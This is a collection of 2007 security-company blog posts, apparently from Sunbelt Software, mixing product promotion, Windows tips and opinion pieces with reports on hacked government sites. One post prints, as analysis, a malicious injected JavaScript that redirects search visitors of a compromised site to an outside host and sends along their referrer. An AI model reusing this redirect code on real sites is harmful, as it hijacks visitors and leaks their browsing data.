Category: Uncategorized

Our new email archiving product, Sunbelt Exchange Archiver, is being released November 5^th. I’m holding a webinar to give a preview peek of the product.

Webinar: Powerful Email Archiving for Exchange Made Easy

Join us for a sneak preview of Sunbelt Software’s new Exchange email archiving and compliance solution, Sunbelt Exchange Archiver™, scheduled for release the first week in November.

If you need a powerful, easy to use, enterprise-class email archiving tool that automatically enables you to comply with all requirements, and allows you or your end-users to transparently retrieve any archived email, then don’t miss this webinar.

The webinar will be hosted by Alex Eckelberry, CEO and Greg Kras, VP of Product Management for Sunbelt Software on Tuesday, October 16th at 2:00pm EDT and will explain the features and benefits of implementing a powerful email archiving solution on your Exchange Server at an affordable price.

Learn how Sunbelt Exchange Archiver can help you:

• Improve Exchange performance
• Eliminate PST headaches
• Dramatically reduce backup times
• Use up to 80% smaller message store
• Meet compliance requirements
• And more

When: Tuesday, October 16, 2007 2:00 PM EDT

To register for this event click here.

I’m actually quite excited about this release. This is a really, really good tool for archiving emails for security, compliance and performance purposes.

Alex Eckelberry

How to make custom toolbars out of folders
One way to make a custom toolbar in XP or Vista is to use the New Toolbar selection when you right click the taskbar. Then you can browse to a folder and turn it into a toolbar. However, if you have multiple monitors, you may in some cases have trouble docking these new toolbars on your secondary monitors. Here’s another way that will overcome that problem.

1. Right click the desktop, select New and then Folder.
2. Name the new folder whatever you want your new toolbar to be.
3. Now drag shortcuts for the applications or files you want to access with the toolbar into the new folder.
4. Drag the folder onto the monitor where you want to dock the new toolbar, if it isn’t there already.
5. Now just drag the folder to any side of the screen (except the one that drags it off screen to another monitor). This will create a toolbar there with the contents of the folder.
6. Right click an empty spot on the new toolbar to change the size of the icons, configure whether or not to include text with the icons, etc.

You can put any kind of file or program on these toolbars. For example, I created a toolbar that holds shortcuts to each computer on my network. You can see screenshots of these custom toolbars on my blog site.

Where are Vista system restore files?
QUESTION: Just a short question. Hope you can answer it for me. Where can I find the system restore files in Vista? Thank you. — Ken K

ANSWER: The file filter driver system for system restore used in XP and other previous versions of Windows is replaced with a new approach in Vista. Now, when you create a restore point, a shadow copy of a file or folder is created. A shadow copy is essentially a previous version of the file or folder at a specific point. Windows Vista can create restore points automatically, or do so when you ask. When the system needs to be restored, files and settings are copied from the shadow copy to the live volume used by Windows Vista. To find shadow copies for a particular file, navigate to that file in Windows Explorer, right click it and select Properties. Then click the Previous Versions tab. Here you’ll see the shadow copies that have been saved on the hard disk and the date when each was created. To find the actual location of the copy, right click it, select Properties, and look at the Location field on the General tab. See the screenshots of this here.

How to log onto XP if you forgot your password redux: In our last TechTips, we wrote about how to logon to XP if you forgot your password. Reader Angus Scott-Fleming writes “Have you seen or used this? I have, it works as advertised, allowing you to boot from a CD and reset any local Windows NT/2000/XP user’s password: Link here.

WGA validation no longer required to download IE 7
Microsoft has changed their policy on downloading Internet Explorer 7. Now all XP users can upgrade to the newest version of the browser – without going through the “Windows Genuine Advantage” validation process to verify that you aren’t running a pirated copy of the operating system. Is this a trend? Will the company back off the annoying (even to those with a genuine OS) WGA validation requirement for other downloads? We don’t know, but it seems like a step in the right direction. Read about it here.

Vista: What’s that power button on the Start menu for?
Vista gives you plenty of options when it comes to shutting down your computer. At the lower right of the Start menu, you’ll see three buttons: a Power button, a lock button and a right arrow button. Clicking the right arrow gives you all the usual choices: switch user, log off, lock, restart, sleep, hibernate and shut down. Clicking the lock button gives you a fast way to lock the computer. Clicking the Power button will save your work and programs as they are and put the computer into sleep mode or, if it’s a portable computer and the battery is low, this will save your work to the hard disk and turn it off. See a screenshot of these buttons here.

IE home page resets to “about:blank” and Defender quits
If you suddenly find that your home page has been reset to “about: blank” and Windows Defender unexpectedly quits, take action quickly. This can mean that your computer has been infected with the Win32/Banker Trojan, and it’s an ugly one because it collects personal information when you visit online banking sites. To find out more, see KB article 894269.

Troubleshoot problems with reading CDs and DVDs
If your Windows XP computer is unable to read a CD or DVD, it can be due to any of several causes. KB article 321641 provides troubleshooting guidelines to help you determine what the problem is and how to resolve it.

Automatic updates cause Svchost.exe issues
When you use Microsoft Update to scan for or apply updates that use Windows Installer 3.1, you may find that CPU usage goes up to 100% and the computer stops responding and/or you get an access violation error related to the svchost.exe process. If this is happening to you, check out KB article 932494.

Deb Shinder

This is actually quite serious. Beer(dot)ch has been hacked and is serving some very vicious malware. DO NOT GO TO THIS SITE UNLESS YOU KNOW WHAT YOU’RE DOING.

Alex Eckelberry
(Hat tip)

Yahoo guy Ian Rogers skateboards (something I used to do until fairly recently, when a broken rib made me realize my age) and used to tour with the Beastie Boys.

Ok, so that makes him generally cool. But his anti-DRM rant at to music industry folks is downright inspiring.

I’m here to tell you today that I for one am no longer going to fall into this trap. If the licensing labels offer their content to Yahoo! put more barriers in front of the users, I’m not interested. Do what you feel you need to do for your business, I’ll be polite, say thank you, and decline to sign. I won’t let Yahoo! invest any more money in consumer inconvenience. I will tell Yahoo! to give the money they were going to give me to build awesome media applications to Yahoo! Mail or Answers or some other deserving endeavor. I personally don’t have any more time to give and can’t bear to see any more money spent on pathetic attempts for control instead of building consumer value. Life’s too short. I want to delight consumers, not bum them out.

If, on the other hand, you’ve seen the light too, there’s a very fun road ahead for us all. Lets get beyond talking about how you get the music and into building context: reasons and ways to experience the music. The opportunity is in the chasm between the way we experience the content and the incredible user-created context of the Web.

Lots more here.

Ok, so time for me to rant:

Back in the 80s, I started my professional career at a company called Borland, one of the great success stories of the early microcomputer software business. (While Borland is still around, it’s not nearly the same company as it was, now having moved to Austin, TX from laid-back Santa Cruz, CA and ventured into software for quality assurance testing. Quite different so I can’t speak to the current culture.)

Philippe Kahn, the CEO of Borland, had a very simple philosophy, which molded a lot of my subsequent thinking and practice as I moved forward in the industry.

The philosophy was:

1. No copy protection.
2. Users agreed to a simple “no-nonsense” license agreement, which simply stated that “software was like a book”, and was written in something close to readable English.
3. If you didn’t like the software, you could get your money back (incidentally, the rate of people returning products was incidental).
4. Products were priced affordably (and this was the linchpin of the whole philosophy).

Simple concepts. But the world was different back then. A lot of people in the business now don’t know how bad things were. But here’s the contrast:

1. Software was copy protected and it was a PAIN. An entire company, Central Point Software, was built around a product called Copy II PC, which allowed you to break copy protection. And even if you were the legal owner of a software program, you still wanted to break the copy protection, so you could actually use the product.
2. License agreements were horribly complex.
3. You couldn’t get a refund if you weren’t satisfied.
4. Software was outrageously expensive.

By doing what he did, Kahn helped boom the business. Many people got started in programming with Turbo Pascal, Borland’s first product. You could actually afford it — it was 50 bucks. Microsoft’s Pascal was something like $500 dollars at the time. The company went on to launch a number of other products, but then got bogged down in some bad acquisitions and subsequently got murdered by Microsoft’s pricing strategies for MS Office. (More on that whole story another time.)

To me, Kahn’s philosophy was completely logical. If you made something people wanted that was affordable. people would buy it and they wouldn’t pirate. And by showing the user respect, and not treating everyone like a dishonest scumbag, guess what: You get more honest users.

And so now we come to DRM. It’s as if no one every learned from our early mistakes.

Here’s what’s going to happen:

1. If it’s not stopped, DRM will continue to get more and more complex, with more and more hardware and software interaction, in order to beat the constant stream of people breaking DRM. This will end up breaking applications and the computers themselves. Complexity built upon complexity results in disaster.

2. Hackers will continue to beat the system and so the cycle will continue, getting more and more complex. See 1 above.

3. Some enterprising person will come along and introduce “DRM free” music/videos/games or what have you, and take the market by storm.

The most you want in a licensing control system is “enough to keep the innocent honest”. Such is the case with registration keys for software products — the honest person will pay the registration fee. The dishonest person will always break it. But when you build a system to stop all possibilities of dishonesty, it almost seems that you are building a system based on the logic that “all people are dishonest”, which has as its corollary, “guilty until proven innocent” — in essence, building a system around proving a negative.

Let’s hope that we can create a simple framework for both artists (who really just want to share their creativity with others while getting fairly recompensed) and users to benefit. If we can relieve the system of the DRM virus, it will flow freely and grow.

Alex Eckelberry
(Hat tip)

Interesting little comment storm on yesterday’s blog post.

Alex Eckelberry

Odd little post by a Michigan ABC affiliate:

…We understand that inappropriate advertisements are appearing on a small number of user computers on Web sites across the Internet, including abc12.com.

The source seems to be Spyware. Some web users may have inadvertently installed Spyware (commonly known as Zango or other third party Spyware) without knowing it by viewing a video from a disreputable Web site, playing a game or downloading an application such as icons, smiley faces or other software.

When users with infected computers search Web sites, inappropriate and unapproved ads may appear within normal advertising space without anyone’s control and no revenue associated.

We want to reassure those who may have seen inappropriate ads on abc12.com that these ads are not coming from us.

Link here. [Update: They have now changed the text.]

Alex Eckelberry

Here’s a nice, self-serving press release for me to post:

Spending on security technology, training, assessments, and certification now accounts for one-fifth of total technology budgets, according to research from the Computing Technology Industry Association (CompTIA).

A survey of 1,070 organizations found that on average, they spent 20 percent of their total technology budget in 2006 on security-related expenses. Thats up from 15 percent in 2005, and 12 percent in 2004.

Organizations also expect to increase spending across all areas related to security in the next 12 months. Nearly one-half of respondents to the CompTIA survey said they intend to increase spending on security-related technologies; and one-third of respondents expect to increase spending on security training. Among those expecting to increase spending, the average increase is in the range of 19-23 percent, regardless of area.

The survey also showed that for each dollar spent on security, about 42 cents is allocated for technology product purchases; 17 cents for security-related processes; 15 cents for training; 12 cents for assessments; 9 cents for certification; and the balance on other items.

Antivirus software, firewalls and proxy servers continue to be the top technologies for security enforcement, utilized by nearly all organizations. The past two years have seen a significant increase in the use of multiple security enforcement technologies to combat attacks, including firewalls, proxy servers, intrusion detection systems, physical access control, multi-factor authentication, and other technologies.

Release here.

Alex Eckelberry

Nope, it’s not podcast. This is good old-fashioned radio.

Archive.org has a collection of recordings of the original CounterSpy show which ran during the 40s and 50s. Link here.

Alex Eckelberry

Pre-checked, installing Ask Toolbar and Search Assistant.

(I’m so biased, it’s not even worth continuing with any commentary.)

Alex Eckelberry

Everyone wants to be Microsoft. There’s people using Google keywords of “Microsoft Antispyware”. There’s fake Microsoft security sites being registered. And now an apparent porn search site, maxing-search(dot)com has a fake Microsoft Antispyware Center.

Swatkat has more here.

Alex Eckelberry
(Thanks Suzi)

Ed Dickson, a fellow blogger, noted today that the now-infamous Marin County Transportation Authority website was still serving porn.

Nah, I knew that stuff might be showing up in the Google cache, but as far as I knew as of Friday, it was clean. So I figured I’d do a quick check for myself.

I was a bit surprised to find out he was right. The Marin County website is back to happily serving porn, after all that’s happened.

A simple Google search using the search term “porn sex site:tam.ca.gov” shows the results.

Some pretty rough stuff, I might add…

And attempts to get you to install malware…

I admit, at this point I feel pretty sorry for these folks.

Let’s hope the Governments peeps don’t try and shut down teh internets again.

Alex Eckelberry

Thought I’d share these numbers with you.

Client agent OS usage by CounterSpy Enterprise:

Windows XP	82.91%
Windows 2000	14.88%
Server 2003	1.83%
Vista build 6000	0.32%
Windows 98	0.03%
Windows NT 4	0.02%
Vista build 5744	0.00%
Vista build 5600	0.00%
Vista build 6001	0.00%
Windows ME	0.00%

This is a sampling of what operating system CounterSpy Enterprise agents deployed at customer sites report back. In this particular sampling, the bias will be toward small to medium business, and shows a very slow adoption of Vista in business environments.

Now, what our website sees:

Windows XP	83.90%
Vista	9.38%
Windows 2000	3.59%
Server 2003	1.62%
Windows 98	1.33%
Windows ME	0.14%
Windows NT	0.02%
Windows 95	0.02%

These are the operating system versions as reported by the browser to our main website. This would reflect a mix of more general usage — consumers and business.

I’d be curious to know what others are seeing out there as well.

Alex Eckelberry
Update: Panda gives their take here.

The Bank of Ghana is serving porn.

A Yahoo search brings up some startling results (thumbnailed due to highly graphic content):

Narrowing down the search a wee bit:

Ouch, nasty stuff.

These pages redirect to porn (graphic content).

The code looks for referrals from search engines. Example:

http://rainbowdisplays(dot)com/xxxxx/fetish(dot)js

function f(){
var r=document.referrer,t=””,q;
if(r.indexOf(“google.”)!=-1)t=”q”;
if(r.indexOf(“msn.”)!=-1)t=”q”;
if(r.indexOf(“yahoo.”)!=-1)t=”p”;
if(r.indexOf(“altavista.”)!=-1)t=”q”;
if(r.indexOf(“aol.”)!=-1)t=”query”;
if(r.indexOf(“ask.”)!=-1)t=”q”;
if(r.indexOf(“comcast.”)!=-1)t=”q”;
if(r.indexOf(“bellsouth.”)!=-1)t=”string”;
if(r.indexOf(“netscape.”)!=-1)t=”query”;
if(r.indexOf(“mywebsearch.”)!=-1)t=”searchfor”;
if(r.indexOf(“peoplepc.”)!=-1)t=”q”;
if(r.indexOf(“starware.”)!=-1)t=”qry”;
if(r.indexOf(“earthlink.”)!=-1)t=”q”;
if(t.length&&((q=r.indexOf(“?”+t+”=”))!=-1(q=r.indexOf(“&”+t+”=”))!=-1))
window.location=(“http://grandsupport(dot)net/td/in(dot)cgi?13&seoref=”+encodeURIComponent(document.referrer)+ “&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=”+encodeURIComponent(document.URL)+”&default_keyword=fetish”);
}window.onFocus = f()

This loads the site grandsupport(dot)net

Let’s hope they get this cleaned up soon (we have notified them).

Alex Eckelberry
(Thanks to Sunbelt researcher Adam Thomas for this.)

I was rooting for Apple’s iPhone. I even had my kids watch Job’s extraordinary keynote earlier this year.

I was irritated, but somewhat forgiving, of Apple decision only allowing AT&T as a provider. It was arrogant, but it was also typically Apple — and it was worth overlooking in light of such a cool phone. Even the whole price drop fiasco didn’t bother me that much.

And we all know that after a while, a few people figured out a way to unlock the phone so it would actually work on a phone system they actually want to use (Apple’s stock price even went up when the first hack was announced).

Well, Apple didn’t seem to notice the message being loudly telegraphed to it. Because, as we all know, Apple, in an even more astounding and ridiculous act of audacity, then turned hacked phones temporarily into a brick. This was an act so stupid, it boggles the mind.

In my opinion, they should have no future, as a phone provider. Because they refuse to even contemplate how the phone business works. They decided to create their own playbook, and they are now going to get hit in the head with it.

What’s the playbook for phones? You come out with versions that supports both TDMA/CDMA and GSM infrastructures. You partner with a number of phone companies, that blow the phone out for cheap in order to get subscribers. You allow your phone (even tacitly) to become unlocked. And if your phone is hot, you sell millions upon millions of them (the RAZR has sold over 100 million phones — and Apple has bragging rights on a million phones sold?).

Customers are a precious commodity.

Competition is fierce in this business, and one only has to look at the new Tilt, BlackBerry 9000 and LG Voyager to see the handwriting on the wall (heck, what about the low-priced Palm Centro?). Even Zune is starting to go DRM-free now (at least partially), so those slick iPods may be less interesting by the minute.

Apple’s future as a phone provider is bleak.

I’m disgusted by Apple’s jackanape arrogance, and its even more regrettable since they have offerings which I believe are truly valuable and need more adoption. They are doing the same stupid things that nearly killed them as a company back in the late 80s and early 90s with closed systems. As just one example, iTunes is a potential goldmind, and they could focus on getting as many iPhones out there to build a larger market for iTunes (as well as getting other hardware devices to support iTunes), to build content-based recurring revenue streams.

I hope Jobs gets the message: Your customers are everything that ever matters in business.

If you treat your customers like idiots, a terrible thing happens: Nothing.

In other words, you get no customers.

Alex Eckelberry

One example:

www.star.bnl.gov/STAR/html/tmp/pub/effplots/virgin(dot)html

And there’s plenty more.

Now, the national security of our country is not at risk (as far as we know). These are just porn redirects coming off of places in Brookhaven’s site.

Alex Eckelberry
(Brookhaven has been contacted and they are taking these down right away.)

Despite all the hullabaloo, the now-infamous Marin County TAM website, responsible for a federal shutdown of ca.gov sites, is still not completely clean. While it’s not redirecting to malware or porn anymore, it still has some dirt underneath the fingernails.

You can play your own version of Find Waldo with this: Go to the site, view source and find the hacked links… (need a hint?).

You can also see that their junk is still showing up on Google.

(These links are both dead, but still show up in Google searches).

Ok, so that was fun. But let’s do a little more hunting, shall we?

Using the simple search term sex porn site:ca.gov, we now find that madera.courts.ca.gov has experienced some pwnage of its own:

Going to these pages, we see this:

We find the intersection of jurisprudence and… Viagra!

Just another day in the life of a security company. Something interesting, every day.

Alex Eckelberry
(Thanks to Sunbelt researcher Suzi Turner for the help.)

Yesterday, we reported on a federal shutdown of “ca.gov” sites to fix a hack.

Well, we have a little more information on this.

It was the Marin County government website that started all of this — something we reported back in September 12th.

They were warned. But they didn’t believe the warnings:

Marin officials first learned of the hacker’s use of the site when private online security companies warned that the Web page had been infiltrated.

Steinhauser said she and other staffers at first were suspicious of the online warnings from security firms because they were worried they could be a form of “phishing” used by hackers seeking to hijack Web sites.

Well, here’s some email that Suzi Turner (who works for Sunbelt as a security consultant) had sent them, on September 12th (she also left them a voice mail).

I had also sent them an email on September 12th:

And I’m pretty darned sure we’re not the only ones who alerted them.

There’s also an SC Mag story this morning, with speculation that this was an iFrame hack. No, actually, it was a DNS hack.

So, was shutting down the entire system overkill? Of course. It was complete overkill. But on the other hand, it’s a wake up call: Keep your site clean. And for pete’s sake, please heed the warnings of security researchers when they send you email.

Alex Eckelberry
(thanks to Ferg for his help, and also the numerous unnamed security researchers who helped on this as well.)

OK, now he’s going to be impossible to have around.

In his latest book, Blink, Malcolm Gladwell tries to discover how great thinkers and decision makers get to be so great. There is no one answer, he concludes. Great decisions can be made in the blink of an eye, but only after years and sometimes decades of building expertise.

Redmond magazine set out on a similar journey, to find out how the visionaries that drive today’s third-party innovations came to be so visionary. We interviewed a dozen serial entrepreneurs, CTOs and company founders to find out where their ideas come from, and how they turn them into the products that you all know and love.

Article here.

All joking aside, Greg is a genuine guru and we’re proud to see him recognized for his talents.

Alex Eckelberry

While I was at the VB conference in Vienna a couple of weeks ago, I would occasionally disappear for long periods of time. While most, I’m sure, assumed that I was spending time at the nearby Birdland jazz club (well, I did spend some time there), I was working on a strategic technology partnership with Vienna-based H&S Software. H&S is a technology leader in the area of data retention and archiving.

Today, we announced that partnership officially. The companies will work together on a strategic basis in the areas of email archiving and data retention.

So, I got to kill more than a few birds with one stone: Attend a great conference, do some important business, see some of the sights of Austria and hang out at the Birdland jazz club. All in all, a good trip.

You’ll see more on our plans for email archiving in the coming weeks. It’s enough to say that I’m very excited by this project 😉

Alex Eckelberry

Good news. Maybe all of our constant kvetching is paying off (here, here, etc.)?

SACRAMENTO — A hacker who directed people from a county website to pornography triggered a federal shutdown of state government Internet and e-mail service late Tuesday afternoon, according to a spokesman for Gov. Arnold Schwarzenegger.

The state system, which uses the domain name “ca.gov,” was never hacked and all of its websites and e-mail should be functioning within a few hours, spokesman Aaron McLear said.

He said the federal government moved to suspend the state’s Internet and e-mail service after someone hacked into a county website that contained the domain name ca.gov and redirected people to a pornography site. McLear said he did not know which county website was hacked.

Link here (via Ferg).

Alex Eckelberry